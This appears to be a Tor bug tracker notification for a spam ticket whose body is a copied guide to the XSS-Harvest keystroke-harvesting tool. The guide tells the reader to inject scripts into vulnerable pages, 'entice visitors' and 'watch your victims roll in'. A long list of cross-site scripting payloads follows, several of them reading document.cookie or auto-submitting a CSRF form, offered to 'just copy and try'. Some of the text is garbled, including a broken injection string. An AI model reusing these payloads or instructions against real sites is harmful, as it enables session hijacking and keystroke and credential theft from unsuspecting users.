[tor-bugs] #23014 [- Select a component]: manish

Tor Bug Tracker & Wiki blackhole at torproject.org
Sun Jul 23 06:09:46 UTC 2017


#23014: manish
--------------------------------------+--------------------------------
     Reporter:  manishhacks8          |      Owner:
         Type:  enhancement           |     Status:  new
     Priority:  Medium                |  Milestone:  Tor: 0.3.1.x-final
    Component:  - Select a component  |    Version:
     Severity:  Normal                |   Keywords:
Actual Points:                        |  Parent ID:
       Points:                        |   Reviewer:
      Sponsor:                        |
--------------------------------------+--------------------------------
 * Server console displays real-time data received (due to the
 multi-threaded nature, keystrokes are displayed as ‘.’ characters to avoid
 confusion).
 * Tested in IE6-9 (reflected XSS protection in IE9 will limit exploitation
 to stored XSS only in most cases), FF5, Chrome and various mobile browsers
 (Safari and Android). Please let me know your success with other browsers.
 * Overcomes browser oddities, such as Internet Explorer throttling
 requests to the same URL when exfiltrating keystrokes.

 How to Exploit XSS with XSS-Harvest?

 Identify a page vulnerable to XSS (reflected or persistent will be fine –
 unless the victim is running IE9 or another plugin such as NoScript).

 Understand the markup of the page. You should be looking to insert
 syntactically correct <script></script> tags in to the source of the
 vulnerable page. Most attackers will insert something like
 ‘<script>alert(1)</script>’ at this stage to ensure the page is actually
 vulnerable.

 Start the XSS-Harvest server as root if you wish to bind to a TCP port <
 1024 (default port is 80), or as a limited user on a port > 1024 using the
 -p option. To start the server you must instruct it to listen with the -l
 option.

 Insert the following ‘injection string’ into the vulnerable page:

 <script src=”>

 This will return the client-side JavaScript to the victim, indicated by
 the ‘i’ in the URL.
 Entice visitors to the infected page (or to follow a link in the case of
 reflected XSS).
 Watch your victims roll in – a new history file will be created for each
 new victim.
 To use the redress function, start the server with the -r parameter:

 ./xss-harvest.pl -l -r http://vulnerablepage.local/login.html

 Basic dependencies:
 HTTP::Server::Simple::CGI, Digest::MD5, Time::Local, Getopt::Std,
 Net::Server::PreFork

 Download XSS-Harvest

 –> New: advanced scripts to find XSS vulnerabilities in websites.
 Just copy any script and try it.
 To Redirect exploit code:

 ';redirecturl='javascript:alert("XSS")
 ';redirecturl='http://google.com/'

 Now for XSS
 Example: www.xyz.com?q="XSS Script"

     "/>alert("Xss:Priyanshu")
     "/></script><script>alert(/XSS : Priyanshu/)</script>

 <body onload=alert(1)>
 "<body onload="alert('XSS by Priyanshu')">

 "><%2Fstyle<%2Fscript><script>confirm("XSS By Priyanshu")<%2Fscript>

 <body onload=document.getElementById("xsrf").submit()>

 <a
 href="data:text/html;based64_,<svg/onload=\u0061&#x6c;&101%72t(1)>">X</a

 <a
 href="data:text/html;based64_,<svg/onload=\u0061&#x6c;&101%72t(document.cookie)>">X</a

     http://test.com<script>alert(document.domain)</script>
     http://test.com<script>alert(document.cookie)</script>

 <img src=x onerror=alert(document.domain)>

 x"></script><img src=x onerror=alert(1)>

 q=" onclick="alert(/XSS/)

 "><iframe src='javascript:prompt(/XSS/);'>

 <iframe src="http://google.com"></iframe>

 "><iframe src=a onload=alert('XSS')<

 </script><script>alert(document.cookie)</script>

 <xss>alert('xss')</xss>

 <iframe src="http://google.com"></iframe>

 DOM Based XSS Scripts

     /default.aspx#"><img src=x onerror=prompt('XSS');>
     /default.aspx#"><img src=x onerror=prompt('0');>

 <img src=x onerror=prompt(1);> by ">

 “><img src=x onerror=prompt(0)>.txt.jpg

 “><img src=x onerror=alert(document.cookie)>

 "><img src=x onerror=prompt(1);>

 "><script>alert('XSS')</script>

 id=abc"><Script>alert(/xss/)</SCRIPT>

 "><img src=" " onMouseover=prompt(/xss/);>

 Default.aspx/" onmouseout="confirm(1)'x="

 For more XSS script coding, visit ha.ckers.org and Brute.

--
Ticket URL: <https://trac.torproject.org/projects/tor/ticket/23014>
Tor Bug Tracker & Wiki <https://trac.torproject.org/>
The Tor Project: anonymity online